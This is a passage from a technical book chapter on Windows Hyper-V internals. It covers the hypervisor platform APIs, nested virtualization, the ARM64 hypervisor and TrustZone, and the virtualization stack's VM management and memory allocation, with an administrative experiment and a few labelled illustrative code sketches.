1. Create the partition in the VID library (Vid.dll) with the WHvCreatePartition API.
2. Configure various internal partition properties—like its virtual processor count, the APIC emulation mode, the kind of requested VMEXITs, and so on—using the WHvSetPartitionProperty API.
3. Create the partition in the VID driver and the hypervisor using the WHvSetupPartition API. (This kind of partition in the hypervisor is called an EXO partition, as described shortly.) The API also creates the partition's virtual processors, which are created in a suspended state.
4. Create the corresponding virtual processor(s) in the VID library through the WHvCreateVirtualProcessor API. This step is important because the API sets up and maps a message buffer into the user mode application, which is used for asynchronous communication with the hypervisor and the thread running the virtual CPUs.
5. Allocate the address space of the partition by reserving a big range of virtual memory with the classic VirtualAlloc function (read more details in Chapter 5 of Part 1) and map it in the hypervisor through the WHvMapGpaRange API. A fine-grained protection of the guest physical memory can be specified when allocating guest physical memory in the guest virtual address space by committing different ranges of the reserved virtual memory.
6. Create the page tables and copy the initial firmware code into the committed memory.
7. Set the initial VP's register content using the WHvSetVirtualProcessorRegisters API.
8. Run the virtual processor by calling the WHvRunVirtualProcessor blocking API. The function returns only when the guest code executes an operation that requires handling in the virtualization stack (a VMEXIT in the hypervisor has been explicitly required to be managed by the third-party virtualization stack) or because of an external request (like the destruction of the virtual processor, for example).
The Windows hypervisor platform APIs are usually able to call services in the hypervisor by sending
different IOCTLs to the \Device\VidExo device object, which is created by the VID driver at initialization
time, only if the HKLM\System\CurrentControlSet\Services\Vid\Parameters\ExoDeviceEnabled registry
value is set to 1. Otherwise, the system does not enable any support for the hypervisor APIs.
Some performance-sensitive hypervisor platform APIs (a good example is provided by
WHvRunVirtualProcessor) can instead call directly into the hypervisor from user mode thanks to the Doorbell
page, which is a special invalid guest physical page that, when accessed, always causes a VMEXIT. The
Windows hypervisor platform API obtains the address of the doorbell page from the VID driver. It
writes to the doorbell page every time it emits a hypercall from user mode. The fault is identified and
treated differently by the hypervisor thanks to the doorbell page’s physical address, which is marked
as “special” in the SLAT page table. The hypervisor reads the hypercall’s code and parameters from the
VP’s registers as per normal hypercalls, and ultimately transfers the execution to the hypercall’s handler
routine. When the latter finishes its execution, the hypervisor finally performs a VMENTRY, landing on
the instruction following the faulty one. This saves a lot of clock cycles for the thread backing the guest
VP, which no longer needs to enter the kernel to emit a hypercall. Furthermore, the VMCALL
and similar opcodes always require kernel privileges to be executed.
The virtual processors of the new third-party VM are dispatched using the root scheduler. If
the root scheduler is disabled, no function of the hypervisor platform API can run. The created partition
in the hypervisor is an EXO partition. EXO partitions are minimal partitions that don't include any
synthetic functionality and have certain characteristics ideal for creating third-party VMs:
- They are always VA-backed types. (More details about VA-backed or micro VMs are provided later in the "Virtualization stack" section.) The partition's memory-hosting process is the user mode application that created the VM, and not a new instance of the VMMEM process.
- They do not have any partition privileges or support any VTL (virtual trust level) other than 0. All of a classical partition's privileges refer to synthetic functionality, which is usually exposed by the hypervisor to the Hyper-V virtualization stack. EXO partitions are used for third-party virtualization stacks. They do not need the functionality brought by any of the classical partition privileges.
- They manually manage timing. The hypervisor does not provide any virtual clock interrupt source for EXO partitions. The third-party virtualization stack must take over the responsibility of providing this. This means that every attempt to read the virtual processor's time-stamp counter will cause a VMEXIT in the hypervisor, which will route the intercept to the user mode thread that runs the VP.
Note EXO partitions include other minor differences compared to classical hypervisor parti-
tions. For the sake of the discussion, however, those minor differences are irrelevant, so they
are not mentioned in this book.
Nested virtualization
Large servers and cloud providers sometimes need to be able to run containers or additional virtual
machines inside a guest partition. Figure 9-20 describes this scenario: The hypervisor that runs on
top of the bare-metal hardware, identified as the L0 hypervisor (L0 stands for Level 0), uses the
virtualization extensions provided by the hardware to create a guest VM. Furthermore, the L0 hypervisor
emulates the processor's virtualization extensions and exposes them to the guest VM (the ability to
expose virtualization extensions is called nested virtualization). The guest VM can decide to run another
instance of the hypervisor (which, in this case, is identified as the L1 hypervisor, where L1 stands for Level 1)
by using the emulated virtualization extensions exposed by the L0 hypervisor. The L1 hypervisor creates
the nested root partition and starts the L2 root operating system in it. In the same way, the L2 root can
orchestrate with the L1 hypervisor to launch a nested guest VM. The final guest VM in this configuration
is called the L2 guest.
[Figure omitted: the Hyper-V hypervisor (Level 0) runs on the hardware layer (an Intel processor with VT-x) and exposes emulated VT-x extensions to a vCPU; inside the guest, a second Hyper-V hypervisor (Level 1) runs a Windows root OS and a nested guest OS (Level 2).]
FIGURE 9-20 Nested virtualization scheme.
Nested virtualization is a software construction: the hypervisor must be able to emulate and
manage virtualization extensions. Each virtualization instruction, while executed by the L1 guest VM,
causes a VMEXIT to the L0 hypervisor, which, through its emulator, can reconstruct the instruction and
perform the needed work to emulate it. At the time of this writing, only Intel and AMD hardware is
supported. The nested virtualization capability should be explicitly enabled for the L1 virtual machine;
otherwise, the L0 hypervisor injects a general protection exception in the VM in case a virtualization
instruction is executed by the guest operating system.
On Intel hardware, Hyper-V allows nested virtualization to work thanks to two main concepts:
- Emulation of the VT-x virtualization extensions
- Nested address translation
As discussed previously in this section, for Intel hardware, the basic data structure that describes
a virtual machine is the virtual machine control structure (VMCS). Other than the standard physical
VMCS representing the L1 VM, when the L0 hypervisor creates a VP belonging to a partition that sup-
ports nested virtualization, it allocates some nested VMCS data structures (not to be confused with a
virtual VMCS, which is a different concept). The nested VMCS is a software descriptor that contains all
the information needed by the L0 hypervisor to start and run a nested VP for a L2 partition. As briefly
introduced in the “Hypervisor startup” section, when the L1 hypervisor boots, it detects whether it’s
running in a virtualized environment and, if so, enables various nested enlightenments, like the enlight-
ened VMCS or the direct virtual flush (discussed later in this section).
As shown in Figure 9-21, for each nested VMCS, the L0 hypervisor also allocates a Virtual VMCS and a
hardware physical VMCS, two similar data structures representing a VP running the L2 virtual machine.
The virtual VMCS is important because it has the key role in maintaining the nested virtualized data. The
physical VMCS instead is loaded by the L0 hypervisor when the L2 virtual machine is started; this happens
when the L0 hypervisor intercepts a VMLAUNCH instruction executed by the L1 hypervisor.
[Figure omitted: the L0 hypervisor keeps a nested VMCS cache for the L1 virtual processors (L1 VP 0, L1 VP 1, L1 VP 2, and so on). Each nested VMCS pairs a virtual VMCS with a hardware physical VMCS, together representing a VP in the L2 VM; a separate physical VMCS represents the VP in the L1 hypervisor.]
FIGURE 9-21 A L0 hypervisor running a L2 VM by virtual processor 2.
In the sample picture, the L0 hypervisor has scheduled the VP 2 for running a L2 VM managed by
the L1 hypervisor (through the nested virtual processor 1). The L1 hypervisor can operate only on virtu-
alization data replicated in the virtual VMCS.
Emulation of the VT-x virtualization extensions
On Intel hardware, the L0 hypervisor supports both enlightened and nonenlightened L1 hypervisors.
The only officially supported configuration is Hyper-V running on top of Hyper-V, though.
In a nonenlightened hypervisor, all the VT-x instructions executed in the L1 guest cause a VMEXIT.
After the L1 hypervisor has allocated the guest physical VMCS for describing the new L2 VM, it usually
marks it as active (through the VMPTRLD instruction on Intel hardware). The L0 hypervisor intercepts
the operation and associates an allocated nested VMCS with the guest physical VMCS specified by the
L1 hypervisor. Furthermore, it fills the initial values for the virtual VMCS and sets the nested VMCS as
active for the current VP. (It does not switch the physical VMCS though; the execution context should
remain the L1 hypervisor.) Each subsequent read or write to the physical VMCS performed by the L1
hypervisor is always intercepted by the L0 hypervisor and redirected to the virtual VMCS (refer to
Figure 9-21).
When the L1 hypervisor launches the VM (performing an operation called VMENTRY), it executes a
specific hardware instruction (VMLAUNCH on Intel hardware), which is intercepted by the L0 hypervi-
sor. For nonenlightened scenarios, the L0 hypervisor copies all the guest fields of the virtual VMCS to
another physical VMCS representing the L2 VM, writes the host fields by pointing them to L0 hypervi-
sor’s entry points, and sets it as active (by using the hardware VMPTRLD instruction on Intel platforms).
In case the L1 hypervisor uses the second level address translation (EPT for Intel hardware), the L0
hypervisor then shadows the currently active L1 extended page tables (see the following section for
more details). Finally, it performs the actual VMENTRY by executing the specific hardware instruction.
As a result, the hardware executes the L2 VM’s code.
While executing the L2 VM, each operation that causes a VMEXIT switches the execution con-
text back to the L0 hypervisor (instead of the L1). As a response, the L0 hypervisor performs another
VMENTRY on the original physical VMCS representing the L1 hypervisor context, injecting a synthetic
VMEXIT event. The L1 hypervisor restarts the execution and handles the intercepted event as for regular
non-nested VMEXITs. When the L1 completes the internal handling of the synthetic VMEXIT event, it
executes a VMRESUME operation, which will be intercepted again by the L0 hypervisor and managed in
a similar way to the initial VMENTRY operation described earlier.
Producing a VMEXIT each time the L1 hypervisor executes a virtualization instruction is an expensive
operation, which contributes to the general slowdown of the L2 VM. To overcome
this problem, the Hyper-V hypervisor supports the enlightened VMCS, an optimization that, when enabled,
allows the L1 hypervisor to load, read, and write virtualization data from a memory page shared
between the L1 and L0 hypervisors (instead of a physical VMCS). The shared page is called the enlightened
VMCS. When the L1 hypervisor manipulates the virtualization data belonging to a L2 VM, instead of
using hardware instructions, which cause a VMEXIT into the L0 hypervisor, it directly reads and writes
from the enlightened VMCS. This significantly improves the performance of the L2 VM.
In enlightened scenarios, the L0 hypervisor intercepts only VMENTRY and VMEXIT operations (and
some others that are not relevant for this discussion). The L0 hypervisor manages VMENTRY in a similar
way to the nonenlightened scenario, but, before doing anything described previously, it copies the
virtualization data located in the shared enlightened VMCS memory page to the virtual VMCS repre-
senting the L2 VM.
Note It is worth mentioning that for nonenlightened scenarios, the L0 hypervisor supports
another technique for preventing VMEXITs while managing nested virtualization data, called
shadow VMCS. Shadow VMCS is a hardware optimization very similar to the enlightened VMCS.
Nested address translation
As previously discussed in the “Partitions’ physical address space” section, the hypervisor uses the SLAT
for providing an isolated guest physical address space to a VM and to translate GPAs to real SPAs. Nested
virtual machines would require another hardware layer of translation on top of the two already existing.
To support nested virtualization, this new layer would need to translate L2 GPAs to L1 GPAs.
Due to the increased complexity in the electronics needed to build a processor’s MMU that manages
three layers of translations, the Hyper-V hypervisor adopted another strategy for providing the additional
layer of address translation, called shadow nested page tables. Shadow nested page tables use a tech-
nique similar to the shadow paging (see the previous section) for directly translating L2 GPAs to SPAs.
When a partition that supports nested virtualization is created, the L0 hypervisor allocates and initial-
izes a nested page table shadowing domain. The data structure is used for storing a list of shadow nested
page tables associated with the different L2 VMs created in the partition. Furthermore, it stores the parti-
tion’s active domain generation number (discussed later in this section) and nested memory statistics.
When the L0 hypervisor performs the initial VMENTRY for starting a L2 VM, it allocates the shadow
nested page table associated with the VM and initializes it with empty values (the resulting physical
address space is empty). When the L2 VM begins code execution, it immediately produces a VMEXIT
to the L0 hypervisor due to a nested page fault (EPT violation in Intel hardware). The L0 hypervisor,
instead of injecting the fault in the L1, walks the guest’s nested page tables built by the L1 hypervisor. If
it finds a valid entry for the specified L2 GPA, it reads the corresponding L1 GPA, translates it to an SPA,
and creates the needed shadow nested page table hierarchy to map it in the L2 VM. It then fills the leaf
table entry with the valid SPA (the hypervisor uses large pages for mapping shadow nested pages) and
resumes the execution directly to the L2 VM by setting the nested VMCS that describes it as active.
For the nested address translation to work correctly, the L0 hypervisor should be aware of any
modifications that happen to the L1 nested page tables; otherwise, the L2 VM could run with stale entries.
This implementation is platform specific; usually hypervisors protect the L2 nested page table as read-only
so that they can be informed when the L1 hypervisor modifies it. The Hyper-V hypervisor
adopts another smart strategy, though. It guarantees that the shadow nested page table describing
the L2 VM is always updated, because of the following two premises:
- When the L1 hypervisor adds new entries in the L2 nested page table, it does not perform any other action for the nested VM (no intercepts are generated in the L0 hypervisor). An entry in the shadow nested page table is added only when a nested page fault causes a VMEXIT in the L0 hypervisor (the scenario described previously).
- As for non-nested VMs, when an entry in the nested page table is modified or deleted, the hypervisor should always emit a TLB flush to correctly invalidate the hardware TLB. In case
of nested virtualization, when the L1 hypervisor emits a TLB flush, the L0 intercepts the request
and completely invalidates the shadow nested page table. The L0 hypervisor maintains a virtual
TLB concept thanks to the generation IDs stored in both the shadow VMCS and the nested
page table shadowing domain. (Describing the virtual TLB architecture is outside the scope
of the book.)
Completely invalidating the shadow nested page table for a single changed address seems
redundant, but it's dictated by the hardware support. (The INVEPT instruction on Intel hardware does
not allow specifying a single GPA to remove from the TLB.) In classical VMs, this is not a problem
because modifications on the physical address space don’t happen very often. When a classical VM is
started, all its memory is already allocated. (The “Virtualization stack” section will provide more de-
tails.) This is not true for VA-backed VMs and VSM, though.
To improve performance in nonclassical nested VMs and VSM scenarios (see the next section
for details), the hypervisor supports the "direct virtual flush" enlightenment, which provides the L1
hypervisor with two hypercalls to directly invalidate the TLB. In particular, the HvFlushGuestPhysicalAddressList
hypercall (documented in the TLFS) allows the L1 hypervisor to invalidate a single entry in the
shadow nested page table, removing the performance penalties associated with flushing the
entire shadow nested page table and the multiple VMEXITs needed to reconstruct it.
EXPERIMENT: Enabling nested virtualization on Hyper-V
As explained in this section, for running a virtual machine into a L1 Hyper-V VM, you should first
enable the nested virtualization feature in the host system. For this experiment, you need a work-
station with an Intel or AMD CPU and Windows 10 or Windows Server 2019 installed (Anniversary
Update RS1 minimum version). You should create a Type-2 VM using the Hyper-V Manager or
Windows PowerShell with at least 4 GB of memory. In the experiment, you’re creating a nested L2
VM into the created VM, so enough memory needs to be assigned.
After the first startup of the VM and the initial configuration, you should shut down the VM
and open an administrative PowerShell window (type Windows PowerShell in the Cortana
search box. Then right-click the PowerShell icon and select Run As Administrator). You should
then type the following command, where the term “<VmName>” must be replaced by your
virtual machine name:
Set-VMProcessor -VMName "<VmName>" -ExposeVirtualizationExtensions $true
To properly verify that the nested virtualization feature is correctly enabled, the command
$(Get-VMProcessor -VMName "<VmName>").ExposeVirtualizationExtensions
should return True.
After the nested virtualization feature has been enabled, you can restart your VM. Before
being able to run the L1 hypervisor in the virtual machine, you should add the necessary component
through Control Panel. In the VM, search for Control Panel in the Cortana box, open it,
click Programs, and then select Turn Windows Features On Or Off. You should check the entire
Hyper-V tree, as shown in the next figure.
Click OK. After the procedure finishes, click Restart to reboot the virtual machine (this step
is needed). After the VM restarts, you can verify the presence of the L1 hypervisor through
the System Information application (type msinfo32 in the Cortana search box. Refer to the
“Detecting VBS and its provided services” experiment later in this chapter for further details).
If the hypervisor has not been started for some reason, you can force it to start by opening an
administrative command prompt in the VM (type cmd in the Cortana search box and select Run
As Administrator) and insert the following command:
bcdedit /set {current} hypervisorlaunchtype Auto
At this stage, you can use the Hyper-V Manager or Windows PowerShell to create a L2 guest
VM directly in your virtual machine. The result can be something similar to the following figure.
From the L2 root partition, you can also enable the L1 hypervisor debugger, in a similar way
as explained in the “Connecting the hypervisor debugger” experiment previously in this chapter.
The only limitation at the time of this writing is that you can’t use the network debugging in nest-
ed configurations; the only supported configuration for debugging the L1 hypervisor is through
serial port. This means that in the host system, you should enable two virtual serial ports in the
L1 VM (one for the hypervisor and the other one for the L2 root partition) and attach them to
named pipes. For type-2 virtual machines, you should use the following PowerShell commands
to set the two serial ports in the L1 VM (as with the previous commands, you should replace the
term “<VMName>” with the name of your virtual machine):
Set-VMComPort -VMName "<VMName>" -Number 1 -Path \\.\pipe\HV_dbg
Set-VMComPort -VMName "<VMName>" -Number 2 -Path \\.\pipe\NT_dbg
After that, you should configure the hypervisor debugger to be attached to the COM1 serial
port, while the NT kernel debugger should be attached to the COM2 (see the previous experi-
ment for more details).
The Windows hypervisor on ARM64
Unlike the x86 and AMD64 architectures, where the hardware virtualization support was added long
after their original design, the ARM64 architecture has been designed with hardware virtualization
support. In particular, as shown in Figure 9-22, the ARM64 execution environment has been split in
three different security domains (called Exception Levels). The EL determines the level of privilege; the
higher the EL, the more privilege the executing code has. Although all the user mode applications run
in EL0, the NT kernel (and kernel mode drivers) usually runs in EL1. In general, a piece of software runs
only in a single exception level. EL2 is the privilege level designed for running the hypervisor (which,
in ARM64, is also called the "Virtual machine manager") and is an exception to this rule. The hypervisor
provides virtualization services and can run in the Non-secure World both in EL2 and EL1. (EL2 does not exist in
the Secure World. ARM TrustZone will be discussed later in this section.)
[Figure omitted: the ARM64 exception levels. In the Non-secure World, applications run at EL0, the kernel at EL1, and the hypervisor at EL2. In the Secure World, trusted applications run at EL0 and the secure kernel at EL1. The monitor runs at EL3.]
FIGURE 9-22 The ARM64 execution environment.
Unlike from the AMD64 architecture, where the CPU enters the root mode (the execution domain
in which the hypervisor runs) only from the kernel context and under certain assumptions, when a
standard ARM64 device boots, the UEFI firmware and the boot manager begin their execution in EL2.
On those devices, the hypervisor loader (or Secure Launcher, depending on the boot flow) is able to
start the hypervisor directly and, at a later time, drop the exception level to EL1 (by emitting an exception
return instruction, also known as ERET).
On top of the exception levels, TrustZone technology enables the system to be partitioned between
two execution security states: secure and non-secure. Secure software can generally access both
secure and non-secure memory and resources, whereas normal software can only access non-secure
memory and resources. The non-secure state is also referred to as the Normal World. This enables an
OS to run in parallel with a trusted OS on the same hardware and provides protection against certain
software attacks and hardware attacks. The secure state, also referred to as the Secure World, usually runs
secure devices (their firmware and IOMMU ranges) and, in general, everything that requires the
processor to be in the secure state.
To correctly communicate with the Secure World, the non-secure OS emits secure monitor calls
(SMCs), which provide a mechanism similar to standard OS syscalls. SMCs are managed by TrustZone.
TrustZone usually provides separation between the Normal and the Secure Worlds through a thin
memory protection layer, which is provided by well-defined hardware memory protection units
(Qualcomm calls these XPUs). The XPUs are configured by the firmware to allow only specific execu-
tion environments to access specific memory locations. (Secure World memory can’t be accessed by
Normal World software.)
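The interception flow described above can be pictured with a small sketch. This is purely illustrative: the function identifiers, the whitelist, and every name below are invented, and the real QHEE/TrustZone interaction happens in EL2/EL3 firmware code, not in user-level software.

```python
# Toy model of SMC interception. The IDs and the access-check policy
# are hypothetical, not ARM's or Qualcomm's actual ones.
ALLOWED_SMC_IDS = {0x8400_0000, 0x8400_0001}   # hypothetical whitelist

def trustzone_handle(smc_id, arg):
    # Stand-in for the Secure Monitor in EL3 servicing the call.
    return ("handled", smc_id, arg)

def hypervisor_intercept(smc_id, arg):
    """Sketch of a QHEE-style intercept: verify the request, then
    either forward it to the Secure World or reject it."""
    if smc_id not in ALLOWED_SMC_IDS:
        return ("rejected", smc_id, arg)
    return trustzone_handle(smc_id, arg)

print(hypervisor_intercept(0x8400_0000, 7))   # forwarded and handled
print(hypervisor_intercept(0xDEAD, 7))        # blocked by the intercept
```

The key point the sketch captures is that the hypervisor sits between the normal-world OS and the Secure Monitor, so every SMC can be validated (or serviced on the caller's behalf) before reaching EL3.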
In ARM64 server machines, Windows is able to directly start the hypervisor. Client machines often
do not have XPUs, even though TrustZone is enabled. (The majority of the ARM64 client devices in
which Windows can run are provided by Qualcomm.) In those client devices, the separation between
the Secure and Normal Worlds is provided by a proprietary hypervisor, named QHEE, which provides
memory isolation using stage-2 memory translation (this layer is the same as the SLAT layer used by the
Windows hypervisor). QHEE intercepts each SMC emitted by the running OS: it can forward the SMC
directly to TrustZone (after having verified the necessary access rights) or do some work on its behalf. In
these devices, TrustZone also has the important responsibility to load and verify the authenticity of the
machine firmware and coordinates with QHEE for correctly executing the Secure Launch boot method.
Although in Windows the Secure World is generally not used (a distinction between the Secure and
Non-secure worlds is already provided by the hypervisor through VTLs), the Hyper-V hypervisor still
runs in EL2. This is not compatible with the QHEE hypervisor, which also runs in EL2. To solve the
problem correctly, Windows adopts a particular boot strategy; the Secure Launch process is orchestrated
with the aid of QHEE. When the Secure Launch terminates, the QHEE hypervisor unloads and gives up
execution to the Windows hypervisor, which has been loaded as part of the Secure Launch. In later
boot stages, after the Secure Kernel has been launched and the SMSS is creating the first user mode
session, a new special trustlet is created (Qualcomm named it “QcExt”). The trustlet acts as the original
ARM64 hypervisor; it intercepts all the SMC requests, verifies their integrity, provides the
needed memory isolation (through the services exposed by the Secure Kernel), and is able to send and
receive commands from the Secure Monitor in EL3.
The SMC interception architecture is implemented in both the NT kernel and the ARM64 trustlet
and is outside the scope of this book. The introduction of the new trustlet has allowed the majority of
the client ARM64 machines to boot with Secure Launch and Virtual Secure Mode enabled by default.
(VSM is discussed later in this chapter.)
The virtualization stack
Although the hypervisor provides isolation and the low-level services that manage the virtualization
hardware, all the high-level implementation of virtual machines is provided by the virtualization stack.
The virtualization stack manages the states of the VMs, provides memory to them, and virtualizes the
hardware by providing a virtual motherboard, the system firmware, and multiple kinds of virtual devices
(emulated, synthetic, and direct access). The virtualization stack also includes VMBus, an important
component that provides a high-speed communication channel between a guest VM and the root
partition and can be accessed through the kernel mode client library (KMCL) abstraction layer.
In this section, we discuss some important services provided by the virtualization stack and analyze
its components. Figure 9-23 shows the main components of the virtualization stack.
[Figure: the root partition/host OS hosts VMMS, VmCompute, and VMWP (with its VDEVs) in user mode, and VSPs, physical device drivers, VMBus, VID.sys, and WinHvr.sys in kernel mode; a child partition's guest OS hosts virtual device drivers and VSCs over VMBus and WinHv.sys; the hypervisor runs beneath both partitions, on top of the hardware.]
FIGURE 9-23 Components of the virtualization stack.
Virtual machine manager service and worker processes
The virtual machine manager service (Vmms.exe) is responsible for providing the Windows
Management Instrumentation (WMI) interface to the root partition, which allows managing the
child partitions through a Microsoft Management Console (MMC) plug-in or through PowerShell.
The VMMS service manages the requests received through the WMI interface on behalf of a VM
(identified internally through a GUID), like start, power off, shutdown, pause, resume, reboot, and so
on. It controls settings such as which devices are visible to child partitions and how the memory and
processor allocation for each partition is defined. The VMMS manages the addition and removal of
devices. When a virtual machine is started, the VMM Service also has the crucial role of creating a
corresponding Virtual Machine Worker Process (VMWP.exe). The VMMS manages VM snapshots
by redirecting snapshot requests to the VMWP process if the VM is running, or by taking the
snapshot itself otherwise.
The VMWP performs various virtualization work that a typical monolithic hypervisor would per-
form (similar to the work of a software-based virtualization solution). This means managing the state
machine for a given child partition (to allow support for features such as snapshots and state transi-
tions), responding to various notifications coming in from the hypervisor, performing the emulation
of certain devices exposed to child partitions (called emulated devices), and collaborating with the VM
service and configuration component. The Worker process has the important role of starting the virtual
motherboard and maintaining the state of each virtual device that belongs to the VM. It also includes
components responsible for remote management of the virtualization stack, as well as an RDP compo-
nent that allows using the remote desktop client to connect to any child partition and remotely view its
user interface and interact with it. The VM Worker process exposes the COM objects that provide the
interface used by the Vmms (and the VmCompute service) to communicate with the VMWP instance
that represents a particular virtual machine.
The VM host compute service (implemented in the Vmcompute.exe and Vmcompute.dll binaries) is
another important component that hosts most of the computation-intensive operations that are not
implemented in the VM Manager Service. Operations like the analysis of a VM’s memory report (for
dynamic memory), management of VHD and VHDX files, and creation of the base layers for containers
are implemented in the VM host compute service. The Worker Process and Vmms can communicate
with the host compute service thanks to the COM objects that it exposes.
The Virtual Machine Manager Service, the Worker Process, and the VM compute service are able to
open and parse multiple configuration files that expose a list of all the virtual machines created in the
system, and the configuration of each of them. In particular:
■ The configuration repository stores the list of virtual machines installed in the system (their
names, configuration files, and GUIDs) in the data.vmcx file located in C:\ProgramData\Microsoft
\Windows Hyper-V.
■ The VM Data Store repository (part of the VM host compute service) is able to open, read, and
write the configuration file (usually with the “.vmcx” extension) of a VM, which contains the list of
virtual devices and the virtual hardware’s configuration.
The VM data store repository is also used to read and write the VM Save State file. The VM State file
is generated while pausing a VM and contains the saved state of the running VM, which can be restored
at a later time (the state of the partition, the content of the VM’s memory, and the state of each virtual device). The
configuration files are formatted using an XML representation of key/value pairs. The plain XML data
is stored compressed using a proprietary binary format, which adds a write-journal logic to make it
resilient against power failures. Documenting the binary format is outside the scope of this book.
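The write-journal idea can be illustrated with a toy sketch. This is the generic journaling pattern only, not the actual proprietary .vmcx binary format (which also compresses the serialized XML payload); the function name and the JSON stand-in are invented for the example.

```python
import json
import os
import tempfile

def journaled_write(path, data):
    """Toy write-journal: persist to a side file first, then atomically
    replace the target, so a power failure leaves either the old or the
    new content on disk, never a torn file."""
    directory = os.path.dirname(os.path.abspath(path))
    fd, journal = tempfile.mkstemp(dir=directory, suffix=".journal")
    with os.fdopen(fd, "w") as f:
        json.dump(data, f)       # stand-in for the serialized key/value pairs
        f.flush()
        os.fsync(f.fileno())     # make sure the journal content hits the disk
    os.replace(journal, path)    # atomic commit of the new version

journaled_write("vm.cfg", {"virtual_machine_name": "VM1", "version": "9.0"})
print(json.load(open("vm.cfg"))["virtual_machine_name"])  # → VM1
```

The atomic-replace step is what makes the scheme crash-resilient: until the rename happens, the previous file version remains fully intact.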
The VID driver and the virtualization stack memory manager
The Virtual Infrastructure Driver (VID.sys) is probably one of the most important components of the
virtualization stack. It provides partition, memory, and processor management services for the virtual
machines running in the child partition, exposing them to the VM Worker process, which lives in the
root. The VM Worker process and the VMMS services use the VID driver to communicate with the
hypervisor, thanks to the interfaces implemented in the Windows hypervisor interface driver (WinHv.
sys and WinHvr.sys), which the VID driver imports. These interfaces include all the code to support the
hypervisor’s hypercall management and allow the operating system (or generic kernel mode drivers) to
access the hypervisor using standard Windows API calls instead of hypercalls.
The VID driver also includes the virtualization stack memory manager. In the previous section, we
described the hypervisor memory manager, which manages the physical and virtual memory of the
hypervisor itself. The guest physical memory of a VM is allocated and managed by the virtualization
stack’s memory manager. When a VM is started, the spawned VM Worker process (VMWP.exe) invokes
the services of the memory manager (defined in the IMemoryManager COM interface) for constructing
the guest VM’s RAM. Allocating memory for a VM is a two-step process:
1.
The VM Worker process obtains a report of the global system’s memory state (by using services
from the Memory Balancer in the VMMS process), and, based on the available system memory,
determines the size of the physical memory blocks to request from the VID driver (through the
VID_RESERVE IOCTL; block sizes vary from 64 MB up to 4 GB). The blocks are allocated by
the VID driver using MDL management functions (MmAllocatePartitionNodePagesForMdlEx in
particular). For performance reasons, and to avoid memory fragmentation, the VID driver imple-
ments a best-effort algorithm to allocate huge and large physical pages (1 GB and 2 MB) before
relying on standard small pages. After the memory blocks are allocated, their pages are depos-
ited to an internal “reserve” bucket maintained by the VID driver. The bucket contains page lists
ordered in an array based on their quality of service (QOS). The QOS is determined based on the
page type (huge, large, and small) and the NUMA node they belong to. This process in the VID
nomenclature is called “reserving physical memory” (not to be confused with the term “reserving
virtual memory,” a concept of the NT memory manager).
2.
From the virtualization stack perspective, physical memory commitment is the process of
emptying the reserved pages in the bucket and moving them into a VID memory block (VSMM_
MEMORY_BLOCK data structure), which is created and owned by the VM Worker process
using the VID driver’s services. In the process of creating a memory block, the VID driver
first deposits additional physical pages in the hypervisor (through the Winhvr driver and the
HvDepositMemory hypercall). The additional pages are needed for creating the SLAT table
page hierarchy of the VM. The VID driver then requests the hypervisor to map the physical
pages describing the entire guest partition’s RAM. The hypervisor inserts valid entries in the
SLAT table and sets their proper permissions. The guest physical address space of the partition
is created. The GPA range is inserted in a list belonging to the VID partition. The VID memory
block is owned by the VM Worker process. It’s also used for tracking guest memory and in DAX
file-backed memory blocks. (See Chapter 11, “Caching and file system support,” for more details
about DAX volumes and PMEM.) The VM Worker process can later use the memory block for
multiple purposes—for example, to access some pages while managing emulated devices.
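The two-step flow can be sketched with a toy model. This is illustrative only: the class and method names are invented, and the real implementation lives in kernel mode inside VID.sys, backed by MDLs and hypercalls rather than Python lists.

```python
from collections import defaultdict

class ReserveBucket:
    """Toy model of the VID reserve bucket: page lists ordered by their
    quality of service (page type and NUMA node)."""
    def __init__(self):
        self.lists = defaultdict(list)  # (page_type, numa_node) -> pages

    def reserve(self, page_type, numa_node, count):
        # Step 1: "reserving physical memory" deposits allocated pages
        # into the bucket, keyed by their QOS.
        self.lists[(page_type, numa_node)].extend(range(count))

    def commit(self, page_type, numa_node, count):
        # Step 2: commitment empties reserved pages out of the bucket
        # and moves them into a "memory block" owned by the caller.
        pages = self.lists[(page_type, numa_node)]
        taken, self.lists[(page_type, numa_node)] = pages[:count], pages[count:]
        return taken

bucket = ReserveBucket()
bucket.reserve("large", 0, 32)         # reserve 32 large pages on NUMA node 0
block = bucket.commit("large", 0, 8)   # commit 8 of them into a memory block
print(len(block), len(bucket.lists[("large", 0)]))  # → 8 24
```

The sketch only captures the bookkeeping split between reservation and commitment; it deliberately omits the hypervisor-side work (SLAT page deposits and GPA mapping) that accompanies the real commit step.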
The birth of a Virtual Machine (VM)
The process of starting up a virtual machine is managed primarily by the VMMS and VMWP
processes. When a request to start a VM (internally identified by a GUID) is delivered to the VMMS service
(through PowerShell or the Hyper-V Manager GUI application), the VMMS service begins the starting
process by reading the VM’s configuration from the data store repository, which includes the VM’s
GUID and the list of all the virtual devices (VDEVs) comprising its virtual hardware. It then verifies that
the path containing the VHD (or VHDX) representing the VM’s virtual hard disk has the correct
access control list (ACL; more details are provided later). If the ACL is not correct, and if specified by the VM
configuration, the VMMS service (which runs under the SYSTEM account) writes a new one, which is
compatible with the new VMWP process instance. The VMMS uses COM services to communicate with
the Host Compute Service to spawn a new VMWP process instance.
The Host Compute Service gets the path of the VM Worker process by querying its COM registra-
tion data located in the Windows registry (HKCU\CLSID\{f33463e0-7d59-11d9-9916-0008744f51f3}
key). It then creates the new process using a well-defined access token, which is built using the virtual
machine SID as the owner. Indeed, the NT Authority of the Windows Security model defines a well-
known subauthority value (83) to identify VMs (more information on system security components
is available in Part 1, Chapter 7, “Security”). The Host Compute Service waits for the VMWP process
to complete its initialization (in this way the exposed COM interfaces become ready). The execution
returns to the VMMS service, which can finally request the VMWP process to start the VM
(through the exposed IVirtualMachine COM interface).
As shown in Figure 9-24, the VM Worker process performs a “cold start” state transition for the
VM. In the VM Worker process, the entire VM is managed through services exposed by the “Virtual
Motherboard.” The Virtual Motherboard emulates an Intel i440BX motherboard on Generation 1
VMs, whereas on Generation 2, it emulates a proprietary motherboard. It manages and maintains the
list of virtual devices and performs the state transitions for each of them. As covered in the next sec-
tion, each virtual device is implemented as a COM object (exposing the IVirtualDevice interface) in a
DLL. The Virtual Motherboard enumerates each virtual device from the VM’s configuration and loads
the corresponding COM object representing the device.
The VM Worker process begins the startup procedure by reserving the resources needed by each
virtual device. It then constructs the VM guest physical address space (virtual RAM) by allocating physi-
cal memory from the root partition through the VID driver. At this stage, it can power up the virtual
motherboard, which will cycle between each VDEV and power it up. The power-up procedure is differ-
ent for each device: for example, synthetic devices usually communicate with their own Virtualization
